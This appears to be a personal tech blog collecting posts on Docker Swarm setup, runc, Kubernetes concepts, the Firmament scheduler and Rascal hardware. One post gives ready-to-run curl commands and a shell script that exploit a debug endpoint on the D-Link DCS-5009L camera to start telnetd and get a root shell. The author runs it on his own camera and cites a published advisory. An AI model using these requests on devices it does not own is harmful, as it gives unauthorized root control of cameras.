DockerCon 2016 Keynote

Andrea and I presented Docker 1.12 orchestration on stage at DockerCon this year — in front of 4,000 people! I don’t even think I’ve ever met 4,000 people. It was awesome!


Getting a root telnet prompt on D-Link DCS-5009L IP Camera

My dad thoughtfully sent me a DCS-5009L nanny cam to play around with yesterday. Naturally, the first thing I wanted to do was get to a root shell on the device. I quickly came across this security advisory from Tao Sauvage at IOActive. Thanks, Tao!

tl;dr: plug in the camera, figure out its IP, and start telnetd like this:

$ curl --data 'ReplySuccessPage=advanced.htm&ReplyErrorPage=errradv.htm&WebDebugLevel=0&WebFuncLevel=1180250000' -X POST http://admin@[CAMERA_IP]/setDebugLevel
$ curl --data 'ReplySuccessPage=home.htm&ReplyErrorPage=errradv.htm&SystemCommand=telnetd&ConfigSystemCommand=test' -X POST http://admin@[CAMERA_IP]/setSystemCommand
$ telnet [CAMERA_IP]
Trying 10.0.1.173...
Connected to 10.0.1.173.
Escape character is '^]'.
 
(none) login: admin
Password: [leave blank]
 
 
BusyBox v1.12.1 (2014-09-03 17:28:29 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
 
#

The default username is admin with an empty password.

Per Tao's security advisory: in the first curl, 1180250000 is a magic constant that puts the device into a debugging mode where the /setSystemCommand HTTP endpoint becomes available. In the second curl, we use that endpoint to run telnetd.
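
For convenience, here is the same two-step exploit wrapped in a small script (a sketch; CAMERA_IP is a placeholder to replace with your camera's address):

#!/bin/sh
CAMERA_IP=10.0.1.173   # replace with your camera's IP

# Step 1: the magic WebFuncLevel constant switches the camera into debug mode
curl -X POST "http://admin@${CAMERA_IP}/setDebugLevel" \
  --data 'ReplySuccessPage=advanced.htm&ReplyErrorPage=errradv.htm&WebDebugLevel=0&WebFuncLevel=1180250000'

# Step 2: the now-exposed /setSystemCommand endpoint starts telnetd
curl -X POST "http://admin@${CAMERA_IP}/setSystemCommand" \
  --data 'ReplySuccessPage=home.htm&ReplyErrorPage=errradv.htm&SystemCommand=telnetd&ConfigSystemCommand=test'

telnet "${CAMERA_IP}"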


Docker Swarm 1.0 with Multi-host Networking: Manual Setup

Jeff Nickoloff had a great Medium post recently about how to set up a Swarm 1.0 cluster using the multi-host networking features added in Docker 1.9. He uses Docker Machine’s built-in Swarm support to create a demonstration cluster in just a few minutes.

In this post, I’ll show how to recreate the same cluster manually — that is, without docker-machine provisioning. This is for advanced users who want to understand what Machine is doing under the hood.

First, let’s take a look at the layout of the cluster Jeff created in his post. There are four machines:

[Figure: Topology of our Swarm cluster.]

To approximate the provisioning that Machine is doing under the hood, we’ll use this Vagrantfile to provision four Ubuntu boxes:

Name        IP              Description
kv2         192.168.33.10   Consul (for both cluster discovery and networking)
c0-master   192.168.33.11   Swarm master
c0-n1       192.168.33.12   Swarm node 1
c0-n2       192.168.33.13   Swarm node 2

In the directory where you saved the Vagrantfile, run vagrant up. This will take 5-10 minutes, but at the end of the process you should have four VMs, each running Docker 1.9 or higher. Note how our Vagrantfile starts each instance of Docker Engine (the docker daemon) with --cluster-store=consul://192.168.33.10:8500 and --cluster-advertise=eth1:2375. Those are the same flags Jeff passes to docker-machine using --engine-opt.
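
If you are not using my Vagrantfile, the important detail is how each Engine gets launched. Here is a rough sketch of the equivalent daemon invocation on each box (assuming Docker 1.9's docker daemon syntax; the actual Vagrantfile presumably wires these flags into the distro's Docker init configuration):

docker daemon \
  -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock \
  --cluster-store=consul://192.168.33.10:8500 \
  --cluster-advertise=eth1:2375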

Because Docker multi-host networking requires a >= 3.16 kernel, we need to do one manual step on each machine to upgrade its kernel. Run these commands from your host shell prompt:

$ vagrant ssh -c "sudo apt-get install -y linux-image-generic-lts-utopic && sudo reboot" kv2
$ vagrant ssh -c "sudo apt-get install -y linux-image-generic-lts-utopic && sudo reboot" c0-master
$ vagrant ssh -c "sudo apt-get install -y linux-image-generic-lts-utopic && sudo reboot" c0-n1
$ vagrant ssh -c "sudo apt-get install -y linux-image-generic-lts-utopic && sudo reboot" c0-n2

(Jeff doesn't have to do this in his tutorial because Machine provisions using an ISO that contains a recent kernel.)

We’re now ready to set up a Consul key/value store just as Jeff did:

$ docker -H=tcp://192.168.33.10:2375 run -d -p 8500:8500 -h consul progrium/consul -server -bootstrap

Here’s how you manually start the swarm manager on the c0-master machine:

$ docker -H=tcp://192.168.33.11:2375 run -d -p 3375:2375 swarm manage consul://192.168.33.10:8500/

Next we start two swarm agent containers on nodes c0-n1 and c0-n2:

$ docker -H=tcp://192.168.33.12:2375 run -d swarm join --advertise=192.168.33.12:2375 consul://192.168.33.10:8500/
$ docker -H=tcp://192.168.33.13:2375 run -d swarm join --advertise=192.168.33.13:2375 consul://192.168.33.10:8500/

Let’s test the cluster:

$ docker -H=tcp://192.168.33.11:3375 info
$ docker -H=tcp://192.168.33.11:3375 run swarm list consul://192.168.33.10:8500/
$ docker -H=tcp://192.168.33.11:3375 run hello-world

Create the overlay network just as Jeff did:

$ docker -H=tcp://192.168.33.11:3375 network create -d overlay myStack1
$ docker -H=tcp://192.168.33.11:3375 network ls

Create the same two (nginx and alpine) containers that Jeff did:

$ docker -H=tcp://192.168.33.11:3375 run -d --name web --net myStack1 nginx
$ docker -H=tcp://192.168.33.11:3375 run -itd --name shell1 --net myStack1 alpine /bin/sh

And verify they can talk to each other just as Jeff did:

$ docker -H=tcp://192.168.33.11:3375 attach shell1
$ ping web
$ apk update && apk add curl
$ curl http://web/

You should find that shell1 is able to ping the nginx container, and vice-versa, just as was the case in Jeff’s tutorial.


What is the Firmament scheduler?

Some in the Kubernetes community are considering adopting a new scheduler based on Malte Schwarzkopf’s Firmament cluster scheduler. I just finished reading Ch. 5 of Malte’s thesis. Here’s a high level summary of what Firmament is about.

Today’s container orchestration systems like Kubernetes, Mesos, Diego and Docker Swarm rely heavily on straightforward heuristics for scheduling. This works well if you want to optimize along a single dimension, like efficient bin packing of workloads to servers. But these heuristics are not designed to simultaneously handle complex tradeoffs between competing priorities like data locality, scheduling delay, soft and hard affinity constraints, inter-task dependency constraints, etc. Taking so many factors into account at once is difficult.

The Firmament scheduler tries to optimize across many tradeoffs, while still making fast scheduling decisions. How? Like Microsoft’s Quincy scheduler, it considers things from a new angle: cost. Suppose we assign a cost to every scheduling tradeoff. The problem of efficient scheduling then becomes a global cost minimization problem, which is much more tractable than trying to design a heuristic that balances many different factors.

Firmament's technical implementation is to model the scheduling problem as a flow graph. Workloads are the flow sources, and they flow into the cluster, whose topology of machines and availability zones is modeled by vertices in the graph. Ultimately, all workloads arrive at a global sink, having either flowed through a machine on which they were scheduled or having remained unscheduled; which path a workload takes is decided by cost.

Here's a simplified diagram I created, based on Firmament's own diagram (itself a simpler version of Quincy's Fig. 4):

[Figure: Simplified example of Firmament's flow graph structure. By assigning costs to each edge, global cost minimization can be performed. For example, each of the three workloads may be scheduled on the cluster or remain unscheduled, depending on the relative costs of their immediate execution vs. delay.]

But how are these costs determined? That’s the coolest part of Firmament: it supports pluggable cost models through a cost model API. Firmament provides several performance-based cost models as well as an interesting one that seeks to minimize data center electricity consumption. Of course, users can supply their own cost models through the API.

For more information on Firmament, here are some resources:


Docker runc

I had some time recently to start playing around with Docker's new runc / OpenContainers work. This is basically the old libcontainer, but it is now governed by an industry consortium under the Linux Foundation. So, Docker and CoreOS are now friends, or at least frenemies, which is very exciting.

The README over on runc doesn't fully explain how to get runc to work, i.e., how to run a simple example container. They provide a nice example container.json file, but it comes without a rootfs, which is confusing if you're just getting started. I posted a GitHub issue comment about how to make their container.json work.

Here are the full steps to get the runc sample working:

1.  Build the runc binary if you haven’t already:

mkdir -p $GOPATH/src/github.com/opencontainers
cd $GOPATH/src/github.com/opencontainers
git clone https://github.com/opencontainers/runc
cd runc
make

2.  Grab their container.json from this section of the runc readme:  opencontainers/runc#ocf-container-json-format

3.  Build a rootfs. The easiest way to do this is to docker export the filesystem of an existing container:


docker run -it ubuntu bash

Now exit immediately (Ctrl+D).


docker ps -a # to find the container ID of the ubuntu container you just exited
docker export [container ID] > docker-ubuntu.tar

Then untar docker-ubuntu.tar into a directory called rootfs, which should sit alongside your container.json. You now have a rootfs that will work with the container.json linked above. From that directory, type sudo runc and you'll be at an sh prompt, inside your container.
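
Concretely, assuming you exported to docker-ubuntu.tar as above and your container.json is in the current directory, the last steps might look like this:

mkdir rootfs
tar -C rootfs -xf docker-ubuntu.tar   # unpack the exported filesystem into ./rootfs
sudo runc                             # runc looks for container.json in the current directory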


Kubernetes Concepts

Once you have a Kubernetes cluster up and running, there are three key abstractions to understand: pods, services and replication controllers.

Pods. A pod — as in a pod of whales (whale metaphors are very popular in this space) — is a group of containers scheduled on the same host. They are tightly coupled because they are all part of the same application and would have run on the same host in the old days. Each container in a pod shares the same network, IPC and PID namespaces. Of course, since Docker doesn't support shared PID namespaces (every container's first process is PID 1 of its own hierarchy and there's no way to merge two running containers), a pod right now is really just a group of Docker containers running on the same host with shared Kubernetes volumes (as distinct from Docker volumes).

Pods are a low-level primitive. Users do not normally create them directly; instead, replication controllers are responsible for creating pods (see below).

You can view pods like this:

kubectl.sh get pods

Read more about pods in the Kubernetes documentation: Kubernetes Pods

Replication Controllers. Pods, like the containers within them, are ephemeral. They do not survive node failures or reboots. Instead, replication controllers are used to keep a certain number of pod replicas running at all times, taking care to start new pod replicas when more are needed. Thus, replication controllers are longer lived than pods and can be thought of as a management abstraction sitting atop the pod concept.

You can view replication controllers like this:

kubectl.sh get replicationControllers

Read more about replication controllers in the Kubernetes documentation: Replication Controllers in Kubernetes.
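
For a concrete sense of what a replication controller definition looks like, here is a minimal sketch you could feed to kubectl.sh. The file name and labels are made up, and it assumes the Kubernetes 1.0-era v1 API; the pre-1.0 v1beta APIs used different field names.

cat > web-rc.yaml <<'EOF'
apiVersion: v1
kind: ReplicationController
metadata:
  name: web
spec:
  replicas: 3          # keep three pod replicas running at all times
  selector:
    app: web
  template:            # pod template used to stamp out new replicas
    metadata:
      labels:
        app: web
    spec:
      containers:
      - name: web
        image: nginx
EOF
kubectl.sh create -f web-rc.yaml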

Services. Services are an abstraction that groups together multiple pods to provide a service. (The term “service” here is used in the microservices architecture sense.) The example in the Kubernetes documentation is that of an image-processing backend, which may consist of several pod replicas. These replicas, grouped together, represent the image processing microservice within your larger application.

A service is longer lived than a replication controller, and a service may create or destroy many replication controllers during its life. Just as replication controllers are a management abstraction sitting atop the pods abstraction, services can be thought of as a control abstraction that sits atop multiple replication controllers.

You can view services like this:

kubectl.sh get services

Read more about services in the Kubernetes documentation: Kubernetes Services.
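
As a companion to the replication controller sketch above, here is a minimal (and equally hypothetical) service definition that groups those pod replicas behind a single stable endpoint, with the same caveats about API versions and example names:

cat > web-svc.yaml <<'EOF'
apiVersion: v1
kind: Service
metadata:
  name: web
spec:
  selector:
    app: web           # route to all pods labeled app=web
  ports:
  - port: 80
    targetPort: 80
EOF
kubectl.sh create -f web-svc.yaml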

Source / Further Reading: Design of Kubernetes


Techniques for Exploring Docker Containers

The preferred method of poking around inside a running Docker container is nsenter. Docker has a nice tutorial.

But what if your container doesn’t have any executable shell like /bin/sh? You can’t enter it with nsenter or docker exec. But here are a few tricks you can use to learn about it.

docker inspect -f '{{.Config.Env}}' [container ID] – will show you the environment variables in the container

docker export [container ID] | tar -tvf - – to list the filesystem inside the container (thanks to cnf on #docker-dev for teaching me this one)

docker export [container ID] | tar -xvf - – run this from a temp directory to extract the entire container filesystem and examine it in more detail

I’ll add more tricks here in the future.


Tutorial: Setting up a Docker Swarm on Your Laptop Using VirtualBox

This tutorial shows you one method you can use to test out Docker Swarm on a single physical machine, like your laptop. We’ll create 3 VMs: two Swarm worker nodes and one Swarm manager.

Setting Up VMs and Networking

First, create three VirtualBox VMs, each with 1 GB of RAM and 1 CPU. Set up each one with Bridged Networking, meaning that your Linksys/Airport/whatever router will assign each of them an IP on the same subnet.

In this example, I’ll use three Ubuntu machines with the hostnames below, plus static DHCP in the router to force them to always have the same IPs:

DockerManager = 10.0.1.100 (runs swarm manager, doesn't run any containers)
DockerNode1 = 10.0.1.101 (first worker node, runs containers)
DockerNode2 = 10.0.1.102 (second worker node, runs containers)

Alternate method: if you don't want your VMs to be exposed directly on your LAN, you can use a VirtualBox NAT Network instead. This will put all three VMs on the same virtual LAN within your laptop. Turn it on by doing this on the host:

$ VBoxManage natnetwork add -t nat-int-network -n "192.168.15.0/24" -e
$ VBoxManage natnetwork start -t nat-int-network

Then change the networking of each VM to use "NAT Network" and select the new "nat-int-network" option.

Now reboot the VMs. Each should have a unique IP of the form: 192.168.15.xxx

Ping one machine from the other, or test like this:
nc -l 192.168.15.4 12345 (on machine A)
echo "bananas" | nc 192.168.15.4 12345 (on machine B)

Basic Installs On Each Machine

You’ll need to install Docker on each machine. I won’t cover that here. Afterward, do this:

docker pull swarm

to retrieve the Swarm container, which is the same container for both the Swarm nodes and the master.

The container, by the way, just contains a single Go binary called swarm. If you build the binary yourself, you can run it directly rather than packaging it into a container. I won't cover that more advanced scenario here, though.

Running Swarm

On any machine, do this one-time operation:

docker run --rm swarm create
# gives back some token like 372cd183a188848c3d5ef0e6f4d7a963

On DockerNode1, start the Docker daemon bound to 0.0.0.0:2375:

sudo stop docker
sudo docker -d -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
# leave the daemon running and open a new terminal tab
docker -H tcp://10.0.1.101:2375 run -d --name node1 swarm join --addr=10.0.1.101:2375 token://372cd183a188848c3d5ef0e6f4d7a963
docker -H tcp://10.0.1.101:2375 ps
# now you see agent running on DockerNode1

Note: if you do `export DOCKER_HOST=tcp://10.0.1.101:2375` you can omit the “-H tcp://…” part.
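
For example (a quick sketch of the equivalent shorthand):

export DOCKER_HOST=tcp://10.0.1.101:2375
docker ps    # same as: docker -H tcp://10.0.1.101:2375 ps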

On DockerNode2, follow the same procedure as on DockerNode1 above, except the join command will look like this:

docker -H tcp://10.0.1.102:2375 run -d --name node2 swarm join --addr=10.0.1.102:2375 token://372cd183a188848c3d5ef0e6f4d7a963

Now you can list the nodes from any machine. For instance, from DockerManager you could do:

docker run --rm swarm list token://372cd183a188848c3d5ef0e6f4d7a963

If you have built your own swarm binary, you can also use it to list the nodes without a container:

./swarm list token://372cd183a188848c3d5ef0e6f4d7a963

Now start the swarm manager. On DockerManager:

docker run -d -p 3375:2375 swarm manage token://372cd183a188848c3d5ef0e6f4d7a963

You can now run commands like this on ANY machine:

docker -H tcp://10.0.1.100:3375 info
docker -H tcp://10.0.1.100:3375 run -it --rm ubuntu bash
docker -H tcp://10.0.1.100:3375 run -it --rm ubuntu bash
docker -H tcp://10.0.1.100:3375 run -it --rm ubuntu bash
docker -H tcp://10.0.1.100:3375 run -it --rm ubuntu bash
[...repeat as many times as you like...]

Now go back to DockerNode1 and try:

docker -H tcp://10.0.1.101:2375 ps

And this on DockerNode2:

docker -H tcp://10.0.1.102:2375 ps

You can see the different bash containers being allocated across the two machines.


Compiling a custom uwsgi for the Rascal

This post is just a note to myself about how to modify the uwsgi source code, recompile uwsgi and install it on a Rascal. Here are the steps:

1. Create a uwsgi source code tarball on goelzer.com

I have the uwsgi source code in a directory (/home/mikegoelzer/goelzer.com/uwsgi). After modifying the C code, I can use these commands to build a new tarball that bitbake will fetch in the next step:


cd /home/mikegoelzer/goelzer.com/uwsgi
tar cvzf uwsgi-1.2.3.tar.gz uwsgi-1.2.3/
md5sum uwsgi-1.2.3.tar.gz && shasum -a 256 uwsgi-1.2.3.tar.gz

The tarball is now accessible at http://goelzer.com/uwsgi/uwsgi-1.2.3.tar.gz. The above command also prints two hashes of the tar file that will be used below.

2. Update the OE uwsgi recipe

On the OE build system, I modify the bitbake recipe for uwsgi in recipes/uwsgi/uwsgi_1.2.3.bb:


DESCRIPTION = "uWSGI is a WSGI web server for Python web applications"
HOMEPAGE = "http://projects.unbit.it/uwsgi/wiki"
SECTION = "net"
PRIORITY = "optional"
LICENSE = "GPLv2"
SRCNAME = "uwsgi"
PR = "r0"

SRC_URI = "http://goelzer.com/uwsgi/uwsgi-1.2.3.tar.gz \
file://editor.ini \
file://public.ini \
file://arm-timer-syscall.patch"

[...]

Here’s the full recipe as a backup. And a shell script used to rebuild uwsgi.

Also, the last two lines of the file should be updated with the hash values computed in step 1.
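
For reference, those two lines follow the standard OpenEmbedded checksum convention and look something like this (a sketch with placeholder values; substitute the md5sum and shasum output from step 1):

SRC_URI[md5sum] = "<md5 of uwsgi-1.2.3.tar.gz>"
SRC_URI[sha256sum] = "<sha256 of uwsgi-1.2.3.tar.gz>"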

3. Rebuild uwsgi using bitbake:


source env.sh
rm oe_sources/uwsgi-1.2.3.tar.gz*
bitbake -c clean uwsgi
bitbake -b uwsgi_1.2.3.bb

4. SCP and install the newly built ipk

From the Rascal:


rm uwsgi_1.2.3-r0.6_armv5te.ipk
opkg remove uwsgi
scp ubuntu@ec2-204-236-242-68.compute-1.amazonaws.com:/home/ubuntu/openembedded-rascal/tmp/deploy/glibc/ipk/armv5te/uwsgi_1.2.3-r0.6_armv5te.ipk .
opkg install uwsgi_1.2.3-r0.6_armv5te.ipk
/etc/init.d/rascal-webserver.sh reload

To see the uwsgi logs:


cat /var/log/uwsgi/public.log


Rascal/Arduino Dual Relay Shield v2

Yesterday, I assembled a few copies of my Dual Relay Shield (rev 2). Here’s a picture of its handsome exterior:

[Figure: Dual Relay Shield v2 (green thing on top) connected to a Rascal 0.6 (red and yellow thing on bottom). The DRS lets you switch 2 relays on and off to control devices up to 5 amps at 220 volts.]

The shield has two relays that can switch up to 5 amps — this could be a pair of lights, motors, speakers, etc. It also has an integrated I2C temperature sensor. You could use this to build, for instance, a web-based thermostat. I expect Brandon will set up a Rascal demo or tutorial using the shield in the near future, to which I’ll link from here once it exists.

All of the design files are open source. You can find them on my Rascal Shield github.

